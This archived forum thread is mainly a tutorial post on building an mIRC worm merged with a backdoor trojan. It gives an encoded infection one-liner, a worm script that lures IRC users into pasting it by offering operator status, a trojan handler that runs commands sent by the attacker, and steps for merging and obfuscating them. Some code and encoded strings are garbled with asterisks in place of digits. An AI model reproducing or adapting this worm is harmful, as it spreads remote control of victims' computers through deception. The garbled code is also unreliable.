PDA

View Full Version : ***how to infect a backdoor trojan***



abs101
09-01-2006, 07:06 PM
properly developed it becomes a backdoor Trojan. This means that people who are infected by this worm you're able to control them. Once infected with this worm they are also infected with the Trojan. Using the Trojan you can control the victims PC.
Infect the victim
It all starts with the next command:
//write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgK
ChpbnMqIGlzd20gJDEtKSAmJiAoJHRhcmdldCA*PSAkbWUpKSB7IC
4gJCsgJDItIHwgaGFsdGRlZiB*IHwgZWxzZWlmICgoYSogaXN*bSA
kMS0pICYmICgkY2hhbikpIHsgLm*zZyBtYWIgaW5mIHwgLm*zZyAk
bmljayBXYW50IHRvIGJlIE*QRVJBVE*SIGluICRjaGFuIGNvcHkvc
GFzdGUgdGhpcy0+IAM0Ly**cml0ZSAu***gJCsgZGVjb2RlKCAkKy
AkZW5jb2RlKCRyZWFkKCRzY*JpcHQsbiwxKSxtKSAkKyAsbSkgJGN
ocigxMjQpIC5sb2FkIC*ycyB*IH0=,m) | .load -rs mab.mrc
This in one line!
Understand the Script
We need to mix these two things:
The worm
on *:text:*a*:#:{ .ignore $nick | .timer 0 *20 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,*),m) $+ ,m) $chr(*24) .load -rs . $chr(*24) //mode $ $+ me +R }
Here is #mab the channel you want to let them join if they're infected with the worm. But since that would not be very stealth anymore we have to do it in another way. We let it message you. We change the .timer 0 *20 .join #mab with .msg mab_ inf. Where mab_ is your nickname.
With this, your worm has been activated, it will now spread amongst channels throughout the network. It will try to send personal messages to random users while ignoring other people in the process. When this has been a success it will then try to send itself to other users, and then persuade them to type the command.
This is the original worm in which I designed. Now we're going to change some functions of the Trojan so that it is constructive. We will remove the user mode +R on the end of the script, because this will only allow users who're authenticated with the official server bot message the victim. Once the Trojan has implemented that is not the objective , so we're going to remove that from the worm. So after these changes we get the next script that we have to merge with the Trojan's script:
on *:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(*) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,*),m) $+ ,m) $chr(*24) .load -rs }
The Trojan
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Combined together they will give us the Backdoored IRC Worm. This mean that the worm will happily spread itself, join the specific channel (here: #mab) and then after that it will then spread itself and then wait for you to control it via the Trojan Client. So you will have the rights todo whatever you want to the victims computer system using mIRC. You actually use the victims mIRC to accomplish certain commands. So infecting a quakenet operator would be one big plus!
I'm now going to give you more details related to the script so that you can truly understand the full extent of the worm and be able to easily modify it to achieve better results.
So basically we want to mix these two "mechanisms":
on *:text:*a*:#:{ DO SOMETHING }
on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }
Solution:
on ^*:text:*:*: {
if ((ins* iswm $*-) && ($target == $me)) DO SOMETHING
elseif ((a* iswm $*-) && ($chan)) DO SOMETHING ELSE
}
In one line:
on ^*:text:*:*: { if ((ins* iswm $*-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $*-) && ($chan)) DO SOMETHING ELSE }
Where this is DO SOMETHING the Trojan's work and DO SOMETHING ELSE is also the Worm's work.
Integrated:
on ^*:text:*:*: { if ((ins* iswm $*-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $*-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,*),m) $+ ,m) $chr(*24) .load -rs . $chr(*24) //mode $ $+ me +R } }
Good this is exactly what we needed. Now this doesn’t look very good, so we need to encode it with mIRC. For this we have to write it firstly like something else, some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The next chars have to be written differently: (){},
Why these chars and how can I control it?
Right then, this is exactly what we needed. Now this doesn't look very acceptable at the moment so we need to encode it with mIRC
//echo -a $asc(char here)
If this gives a bad result this means that the char must be written in another way.
Example encoding of “,”:
//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct
Note:
$+ = pasting two strings together
| = $chr(*24)
, = $chr(44)
( = $chr(40)
) = $chr(4*)
{ = $chr(*2*)
} = $chr(*25)
Pleas be aware that we don't necessary have to encode that in this way, sometimes this method isn't needed.
For finding the numbers you use this:
//echo -a $asc($?)
This will pop up an input box, just fill in the char and you'll get the number as a result.
Good, we have the knowledge for $encoding now. So this is what we get before we start encoding:
on ^*:text:*:*: $chr(*2*) if ((ins* iswm $ $+ *-) && ($ $+ target == $ $+ me)) $chr(*2*) . $ $+ + $ $+ 2- $chr(*24) haltdef $chr(*25) $chr(*24) elseif ((a* iswm $ $+ *-) && ($chan)) $chr(*2*) .msg mab inf $chr(*24) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(*) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,*),m) $ $+ + ,m) $ $+ chr(*24) .load -rs $chr(*25) $chr(*25)
So:
//say $encode(on ^*:text:*:*: $chr(*2*) if ((ins* iswm $ $+ *-) && ($ $+ target == $ $+ me)) $chr(*2*) . $ $+ + $ $+ 2- $chr(*24) haltdef $chr(*25) $chr(*24) elseif ((a* iswm $ $+ *-) && ($chan)) $chr(*2*) .msg mab inf $chr(*24) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(*) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,*),m) $ $+ + ,m) $ $+ chr(*24) .load -rs $chr(*25) $chr(*25),m)
For finding the $encoded variable we split it up as global variables. The variables are set with
/set %var STRING
So for locating it properly we need to write the next mIRC formula:
//say $encode(%var* $+ %var2 $+ %var* $+ %var4,m)
But we don't necessarily need to set is as variables before we encode it. So you can just use the encode line.
We find the next as result:

b24gXio6dGV4dDoqOio6IHsgaWYgKChpbnMqIGlzd20gJDEtKSAmJ
iAoJHRhcmdldCA*PSAkbWUpKSB7IC4gJCsgJDItIHwgaGFsdGRlZi
B*IHwgZWxzZWlmICgoYSogaXN*bSAkMS0pICYmICgkY2hhbikpIHs
gLm*zZyBtYWIgaW5mIHwgLm*zZyAkbmljayBXYW50IHRvIGJlIE*Q
RVJBVE*SIGluICRjaGFuIGNvcHkvcGFzdGUgdGhpcy0+IAM0Ly**c
ml0ZSAu***gJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY*
JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC*ycyB
*IH0=
This pasted to each other in one line!

WARNING:
DO THOSES STEPS CARFULY!!!!!!

Newby_Programme
09-24-2006, 02:37 AM
I cant read that at all get some paragraphs and space it out more so people can read it better. I cant read anything cause you got the codes mixed in with the sentences and its all over the place

Ezekiel
09-24-2006, 05:00 AM
I cant read that at all get some paragraphs and space it out more so people can read it better. I cant read anything cause you got the codes mixed in with the sentences and its all over the place

Just ignore it - he didn't write any of that.

Newby_Programme
09-24-2006, 05:56 AM
o ok must be why its all together cause if someone wrote it they most likely would but a space. Copy Paste